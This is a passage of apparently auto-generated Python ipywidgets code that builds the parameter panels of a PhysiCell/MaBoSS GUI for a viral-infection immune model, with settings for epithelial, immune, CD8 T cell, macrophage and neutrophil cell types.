description_btn = Button(description='rate of secreting pro-inflamatory cytokine after activation', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float74, units_btn, description_btn]
box80 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_immune_cell', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float75 = FloatText(value='0.0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='used internally to track activation state', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float75, units_btn, description_btn]
box81 = Box(children=row, layout=box_layout)
name_btn = Button(description='virus_expression_threshold', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float76 = FloatText(value='10.0', step='1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='minimal quantity of virus to activate virus_expression node', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float76, units_btn, description_btn]
box82 = Box(children=row, layout=box_layout)
self.cell_def_vbox0 = VBox([
            div_row1, box0, box1, box2, box3,
            div_row2, death_model1, box4, box5, box6, box7, box8, box9, box10,
            death_model2, box11, box12, box13, box14, box15, box16, box17,
            div_row3, box18, box19, box20, box21, box22, box23, box24, box25, box26,
            div_row4, box27, box28, box29, box30, box31,
            div_row5, box32, box33, box34, self.bool2, self.bool3,
            chemotaxis_btn, self.bool4, box35, box36,
            div_row6, box37, box38, box39, box40, box41, box42, box43, box44,
            div_row7,
            div_row8, box45,
box46,
box47,
box48,
box49,
box50,
box51,
box52,
box53,
box54,
box55,
box56,
box57,
box58,
box59,
box60,
box61,
box62,
box63,
box64,
box65,
box66,
box67,
box68,
box69,
box70,
box71,
box72,
box73,
box74,
box75,
box76,
box77,
box78,
box79,
box80,
box81,
box82,
])
# ------------------------------------------
self.cell_def_vboxes.append(self.cell_def_vbox0)
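        # Editor note (hedged): the per-cell-type VBoxes collected in
        # self.cell_def_vboxes are typically toggled when the dropdown value
        # changes, e.g. (hypothetical):
        #
        #     self.cell_def_vboxes[idx].layout.display = 'block'   # selected type
        #     self.cell_def_vboxes[other].layout.display = 'none'  # the rest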
# >>>>>>>>>>>>>>>>> <cell_definition> = lung epithelium
# -------------------------
div_row9 = Button(description='phenotype:death', disabled=True, layout=divider_button_layout)
div_row9.style.button_color = 'orange'
death_model1 = Button(description='model: apoptosis', disabled=True, layout={'width':'30%'})
death_model1.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float77 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float77, units_btn, ]
box83 = Box(children=row, layout=box_layout)
# -------------------------
div_row10 = Button(description='phenotype:motility', disabled=True, layout=divider_button_layout)
div_row10.style.button_color = 'orange'
self.bool5 = Checkbox(description='enabled', value=False,layout=name_button_layout)
# -------------------------
div_row11 = Button(description='phenotype:secretion', disabled=True, layout=divider_button_layout)
div_row11.style.button_color = 'orange'
# -------------------------
div_row12 = Button(description='phenotype:intracellular (maboss)', disabled=True, layout=divider_button_layout)
div_row12.style.button_color = 'orange'
bnd_filename = Button(description='bnd_filename', disabled=True, layout=name_button_layout)
bnd_filename.style.button_color = 'lightgreen'
self.bnd_filenames[1] = Text(value='../data/boolean_network/epithelial_cell_2.bnd', style=style, layout=widget_layout)
row = [bnd_filename, self.bnd_filenames[1]]
box84 = Box(children=row, layout=box_layout)
cfg_filename = Button(description='cfg_filename', disabled=True, layout=name_button_layout)
cfg_filename.style.button_color = 'tan'
self.cfg_filenames[1] = Text(value='../data/boolean_network/epithelial_cell_2.cfg', style=style, layout=widget_layout)
row = [cfg_filename, self.cfg_filenames[1]]
box85 = Box(children=row, layout=box_layout)
time_step = Button(description='time_step', disabled=True, layout=name_button_layout)
time_step.style.button_color = 'lightgreen'
self.float78 = FloatText(value='12', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
        units_btn.style.button_color = 'lightgreen'
row = [time_step, self.float78, units_btn]
box86 = Box(children=row, layout=box_layout)
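        # Editor note (hedged): the .bnd/.cfg pair above configures a MaBoSS
        # Boolean network for this cell type. A .bnd file declares each node
        # with its logic and rates, roughly (illustrative only, not the
        # actual epithelial network):
        #
        #     node Virus_sensing {
        #       logic = Virus_inside & !IFN_response;
        #       rate_up = @logic ? 1.0 : 0.0;
        #       rate_down = @logic ? 0.0 : 1.0;
        #     }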
# ================== <custom_data>, if present ==================
self.cell_def_vbox1 = VBox([
div_row9, death_model1,box83, div_row10, self.bool5,div_row11, div_row12, box84,box85,box86, ])
# ------------------------------------------
self.cell_def_vboxes.append(self.cell_def_vbox1)
# >>>>>>>>>>>>>>>>> <cell_definition> = immune
# -------------------------
div_row13 = Button(description='phenotype:mechanics', disabled=True, layout=divider_button_layout)
div_row13.style.button_color = 'orange'
name_btn = Button(description='cell_cell_adhesion_strength', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float79 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float79, units_btn]
box87 = Box(children=row, layout=box_layout)
name_btn = Button(description='cell_cell_repulsion_strength', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float80 = FloatText(value='10', step='1', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float80, units_btn]
box88 = Box(children=row, layout=box_layout)
# -------------------------
div_row14 = Button(description='phenotype:death', disabled=True, layout=divider_button_layout)
div_row14.style.button_color = 'orange'
death_model1 = Button(description='model: apoptosis', disabled=True, layout={'width':'30%'})
death_model1.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float81 = FloatText(value='5e-4', step='0.0001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float81, units_btn]
box89 = Box(children=row, layout=box_layout)
# -------------------------
div_row15 = Button(description='phenotype:motility', disabled=True, layout=divider_button_layout)
div_row15.style.button_color = 'orange'
name_btn = Button(description='speed', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float82 = FloatText(value='4', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='micron/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float82, units_btn]
box90 = Box(children=row, layout=box_layout)
name_btn = Button(description='persistence_time', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float83 = FloatText(value='5', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float83, units_btn]
box91 = Box(children=row, layout=box_layout)
name_btn = Button(description='migration_bias', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float84 = FloatText(value='0.70', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float84, units_btn]
box92 = Box(children=row, layout=box_layout)
self.bool6 = Checkbox(description='enabled', value=True,layout=name_button_layout)
self.bool7 = Checkbox(description='use_2D', value=True,layout=name_button_layout)
chemotaxis_btn = Button(description='chemotaxis', disabled=True, layout={'width':'30%'})
chemotaxis_btn.style.button_color = '#ffde6b'
self.bool8 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.chemotaxis_substrate3 = Text(value='chemokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_substrate3]
box93 = Box(children=row, layout=box_layout)
name_btn = Button(description='direction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.chemotaxis_direction3 = Text(value='1', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_direction3]
box94 = Box(children=row, layout=box_layout)
# -------------------------
div_row16 = Button(description='phenotype:secretion', disabled=True, layout=divider_button_layout)
div_row16.style.button_color = 'orange'
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text4 = Text(value='pro-inflammatory cytokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text4]
box95 = Box(children=row, layout=box_layout)
name_btn = Button(description='uptake_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float85 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float85, units_btn]
box96 = Box(children=row, layout=box_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text5 = Text(value='chemokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text5]
box97 = Box(children=row, layout=box_layout)
name_btn = Button(description='uptake_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float86 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float86, units_btn]
box98 = Box(children=row, layout=box_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text6 = Text(value='debris', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text6]
box99 = Box(children=row, layout=box_layout)
name_btn = Button(description='uptake_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float87 = FloatText(value='0.1', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float87, units_btn]
box100 = Box(children=row, layout=box_layout)
# ================== <custom_data>, if present ==================
self.cell_def_vbox2 = VBox([
div_row13, box87, box88,
div_row14, death_model1, box89,
div_row15, box90, box91, box92, self.bool6, self.bool7, chemotaxis_btn, self.bool8, box93, box94,
div_row16, box95, box96, box97, box98, box99, box100,
])
# ------------------------------------------
self.cell_def_vboxes.append(self.cell_def_vbox2)
# >>>>>>>>>>>>>>>>> <cell_definition> = CD8 Tcell
# -------------------------
div_row17 = Button(description='phenotype:death', disabled=True, layout=divider_button_layout)
div_row17.style.button_color = 'orange'
death_model1 = Button(description='model: apoptosis', disabled=True, layout={'width':'30%'})
death_model1.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float88 = FloatText(value='2.8e-4', step='1e-05', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float88, units_btn]
box101 = Box(children=row, layout=box_layout)
# -------------------------
div_row18 = Button(description='phenotype:motility', disabled=True, layout=divider_button_layout)
div_row18.style.button_color = 'orange'
name_btn = Button(description='migration_bias', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float89 = FloatText(value='0.70', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float89, units_btn]
box102 = Box(children=row, layout=box_layout)
self.bool9 = Checkbox(description='enabled', value=True,layout=name_button_layout)
self.bool10 = Checkbox(description='use_2D', value=True,layout=name_button_layout)
chemotaxis_btn = Button(description='chemotaxis', disabled=True, layout={'width':'30%'})
chemotaxis_btn.style.button_color = '#ffde6b'
self.bool11 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.chemotaxis_substrate4 = Text(value='chemokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_substrate4]
box103 = Box(children=row, layout=box_layout)
name_btn = Button(description='direction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.chemotaxis_direction4 = Text(value='1', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_direction4]
box104 = Box(children=row, layout=box_layout)
# -------------------------
div_row19 = Button(description='phenotype:volume', disabled=True, layout=divider_button_layout)
div_row19.style.button_color = 'orange'
name_btn = Button(description='total', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float90 = FloatText(value='478', step='10', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float90, units_btn]
box105 = Box(children=row, layout=box_layout)
name_btn = Button(description='nuclear', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float91 = FloatText(value='47.8', step='1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float91, units_btn]
box106 = Box(children=row, layout=box_layout)
# -------------------------
div_row20 = Button(description='phenotype:secretion', disabled=True, layout=divider_button_layout)
div_row20.style.button_color = 'orange'
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text7 = Text(value='debris', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text7]
box107 = Box(children=row, layout=box_layout)
name_btn = Button(description='uptake_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float92 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float92, units_btn]
box108 = Box(children=row, layout=box_layout)
# -------------------------
div_row21 = Button(description='phenotype:intracellular (maboss)', disabled=True, layout=divider_button_layout)
div_row21.style.button_color = 'orange'
bnd_filename = Button(description='bnd_filename', disabled=True, layout=name_button_layout)
bnd_filename.style.button_color = 'tan'
self.bnd_filenames[3] = Text(value='../data/boolean_network/cd8t_cell.bnd', style=style, layout=widget_layout)
row = [bnd_filename, self.bnd_filenames[3]]
box109 = Box(children=row, layout=box_layout)
cfg_filename = Button(description='cfg_filename', disabled=True, layout=name_button_layout)
cfg_filename.style.button_color = 'lightgreen'
self.cfg_filenames[3] = Text(value='../data/boolean_network/cd8t_cell.cfg', style=style, layout=widget_layout)
row = [cfg_filename, self.cfg_filenames[3]]
box110 = Box(children=row, layout=box_layout)
time_step = Button(description='time_step', disabled=True, layout=name_button_layout)
time_step.style.button_color = 'tan'
self.float93 = FloatText(value='12', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [time_step, self.float93, units_btn]
box111 = Box(children=row, layout=box_layout)
# ================== <custom_data>, if present ==================
div_row22 = Button(description='Custom Data',disabled=True, layout=divider_button_layout)
div_row22.style.button_color = 'cyan'
name_btn = Button(description='cell_attachment_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float94 = FloatText(value='0.2', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float94, units_btn, description_btn]
box112 = Box(children=row, layout=box_layout)
name_btn = Button(description='cell_attachment_lifetime', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float95 = FloatText(value='8.5', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float95, units_btn, description_btn]
box113 = Box(children=row, layout=box_layout)
self.cell_def_vbox3 = VBox([
div_row17, death_model1, box101,
div_row18, box102, self.bool9, self.bool10, chemotaxis_btn, self.bool11, box103, box104,
div_row19, box105, box106,
div_row20, box107, box108,
div_row21, box109, box110, box111,
div_row22, box112, box113,
])
# ------------------------------------------
self.cell_def_vboxes.append(self.cell_def_vbox3)
# >>>>>>>>>>>>>>>>> <cell_definition> = macrophage
# -------------------------
div_row23 = Button(description='phenotype:death', disabled=True, layout=divider_button_layout)
div_row23.style.button_color = 'orange'
death_model1 = Button(description='model: apoptosis', disabled=True, layout={'width':'30%'})
death_model1.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float96 = FloatText(value='2.1e-4', step='1e-05', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float96, units_btn, ]
box114 = Box(children=row, layout=box_layout)
# -------------------------
div_row24 = Button(description='phenotype:motility', disabled=True, layout=divider_button_layout)
div_row24.style.button_color = 'orange'
name_btn = Button(description='migration_bias', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float97 = FloatText(value='0.7', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float97, units_btn]
box115 = Box(children=row, layout=box_layout)
name_btn = Button(description='persistence_time', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float98 = FloatText(value='5', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float98, units_btn]
box116 = Box(children=row, layout=box_layout)
self.bool12 = Checkbox(description='enabled', value=True,layout=name_button_layout)
self.bool13 = Checkbox(description='use_2D', value=True,layout=name_button_layout)
chemotaxis_btn = Button(description='chemotaxis', disabled=True, layout={'width':'30%'})
chemotaxis_btn.style.button_color = '#ffde6b'
self.bool14 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.chemotaxis_substrate5 = Text(value='debris', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_substrate5]
box117 = Box(children=row, layout=box_layout)
name_btn = Button(description='direction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.chemotaxis_direction5 = Text(value='1', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_direction5]
box118 = Box(children=row, layout=box_layout)
# -------------------------
div_row25 = Button(description='phenotype:volume', disabled=True, layout=divider_button_layout)
div_row25.style.button_color = 'orange'
name_btn = Button(description='total', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float99 = FloatText(value='4849', step='100', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float99, units_btn, ]
box119 = Box(children=row, layout=box_layout)
name_btn = Button(description='nuclear', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float100 = FloatText(value='485', step='10', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float100, units_btn, ]
box120 = Box(children=row, layout=box_layout)
name_btn = Button(description='cytoplasmic_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float101 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float101, units_btn, ]
box121 = Box(children=row, layout=box_layout)
# -------------------------
div_row26 = Button(description='phenotype:intracellular (maboss)', disabled=True, layout=divider_button_layout)
div_row26.style.button_color = 'orange'
bnd_filename = Button(description='bnd_filename', disabled=True, layout=name_button_layout)
bnd_filename.style.button_color = 'lightgreen'
self.bnd_filenames[4] = Text(value='../data/boolean_network/macrophage.bnd', style=style, layout=widget_layout)
row = [bnd_filename, self.bnd_filenames[4]]
box122 = Box(children=row, layout=box_layout)
cfg_filename = Button(description='cfg_filename', disabled=True, layout=name_button_layout)
cfg_filename.style.button_color = 'tan'
self.cfg_filenames[4] = Text(value='../data/boolean_network/macrophage.cfg', style=style, layout=widget_layout)
row = [cfg_filename, self.cfg_filenames[4]]
box123 = Box(children=row, layout=box_layout)
time_step = Button(description='time_step', disabled=True, layout=name_button_layout)
time_step.style.button_color = 'lightgreen'
self.float102 = FloatText(value='12', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [time_step, self.float102, units_btn]
box124 = Box(children=row, layout=box_layout)
# ================== <custom_data>, if present ==================
div_row27 = Button(description='Custom Data',disabled=True, layout=divider_button_layout)
div_row27.style.button_color = 'cyan'
name_btn = Button(description='phagocytosis_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float103 = FloatText(value='0.167', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float103, units_btn, description_btn]
box125 = Box(children=row, layout=box_layout)
name_btn = Button(description='sensitivity_to_debris_chemotaxis', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float104 = FloatText(value='1.0', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='relative sensitivity to debris in chemotaxis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float104, units_btn, description_btn]
box126 = Box(children=row, layout=box_layout)
name_btn = Button(description='sensitivity_to_chemokine_chemotaxis', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float105 = FloatText(value='10.0', step='1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='relative sensitivity to chemokine in chemotaxis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float105, units_btn, description_btn]
box127 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_speed', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float106 = FloatText(value='0.4', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='micron/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='speed after activation', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float106, units_btn, description_btn]
box128 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_cytokine_secretion_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float107 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='rate of secreting pro-inflammatory cytokine after activation', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float107, units_btn, description_btn]
box129 = Box(children=row, layout=box_layout)
self.cell_def_vbox4 = VBox([
div_row23, death_model1, box114,
div_row24, box115, box116, self.bool12, self.bool13, chemotaxis_btn, self.bool14, box117, box118,
div_row25, box119, box120, box121,
div_row26, box122, box123, box124,
div_row27, box125, box126, box127, box128, box129,
])
# ------------------------------------------
self.cell_def_vboxes.append(self.cell_def_vbox4)
# >>>>>>>>>>>>>>>>> <cell_definition> = neutrophil
# -------------------------
div_row28 = Button(description='phenotype:death', disabled=True, layout=divider_button_layout)
div_row28.style.button_color = 'orange'
death_model1 = Button(description='model: apoptosis', disabled=True, layout={'width':'30%'})
death_model1.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float108 = FloatText(value='8.9e-4', step='0.0001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float108, units_btn, ]
box130 = Box(children=row, layout=box_layout)
# -------------------------
div_row29 = Button(description='phenotype:motility', disabled=True, layout=divider_button_layout)
div_row29.style.button_color = 'orange'
name_btn = Button(description='speed', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float109 = FloatText(value='19', step='1', style=style, layout=widget_layout)
units_btn = Button(description='micron/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float109, units_btn]
box131 = Box(children=row, layout=box_layout)
name_btn = Button(description='migration_bias', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float110 = FloatText(value='0.91', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float110, units_btn]
box132 = Box(children=row, layout=box_layout)
name_btn = Button(description='persistence_time', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float111 = FloatText(value='5', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float111, units_btn]
box133 = Box(children=row, layout=box_layout)
self.bool15 = Checkbox(description='enabled', value=True,layout=name_button_layout)
self.bool16 = Checkbox(description='use_2D', value=True,layout=name_button_layout)
chemotaxis_btn = Button(description='chemotaxis', disabled=True, layout={'width':'30%'})
chemotaxis_btn.style.button_color = '#ffde6b'
self.bool17 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.chemotaxis_substrate6 = Text(value='debris', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_substrate6]
box134 = Box(children=row, layout=box_layout)
name_btn = Button(description='direction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.chemotaxis_direction6 = Text(value='1', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_direction6]
box135 = Box(children=row, layout=box_layout)
# -------------------------
div_row30 = Button(description='phenotype:secretion', disabled=True, layout=divider_button_layout)
div_row30.style.button_color = 'orange'
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.text8 = Text(value='virion', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text8]
box136 = Box(children=row, layout=box_layout)
name_btn = Button(description='uptake_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float112 = FloatText(value='0.1', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float112, units_btn]
box137 = Box(children=row, layout=box_layout)
# -------------------------
div_row31 = Button(description='phenotype:volume', disabled=True, layout=divider_button_layout)
div_row31.style.button_color = 'orange'
name_btn = Button(description='total', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float113 = FloatText(value='1437', step='100', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float113, units_btn, ]
box138 = Box(children=row, layout=box_layout)
name_btn = Button(description='nuclear', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float114 = FloatText(value='143.7', step='10', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float114, units_btn, ]
box139 = Box(children=row, layout=box_layout)
name_btn = Button(description='cytoplasmic_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float115 = FloatText(value='0.045', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float115, units_btn, ]
box140 = Box(children=row, layout=box_layout)
# -------------------------
div_row32 = Button(description='phenotype:intracellular (maboss)', disabled=True, layout=divider_button_layout)
div_row32.style.button_color = 'orange'
bnd_filename = Button(description='bnd_filename', disabled=True, layout=name_button_layout)
bnd_filename.style.button_color = 'tan'
self.bnd_filenames[5] = Text(value='../data/boolean_network/neutrophil.bnd', style=style, layout=widget_layout)
row = [bnd_filename, self.bnd_filenames[5]]
box141 = Box(children=row, layout=box_layout)
cfg_filename = Button(description='cfg_filename', disabled=True, layout=name_button_layout)
cfg_filename.style.button_color = 'lightgreen'
self.cfg_filenames[5] = Text(value='../data/boolean_network/neutrophil.cfg', style=style, layout=widget_layout)
row = [cfg_filename, self.cfg_filenames[5]]
box142 = Box(children=row, layout=box_layout)
time_step = Button(description='time_step', disabled=True, layout=name_button_layout)
time_step.style.button_color = 'tan'
self.float116 = FloatText(value='12', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
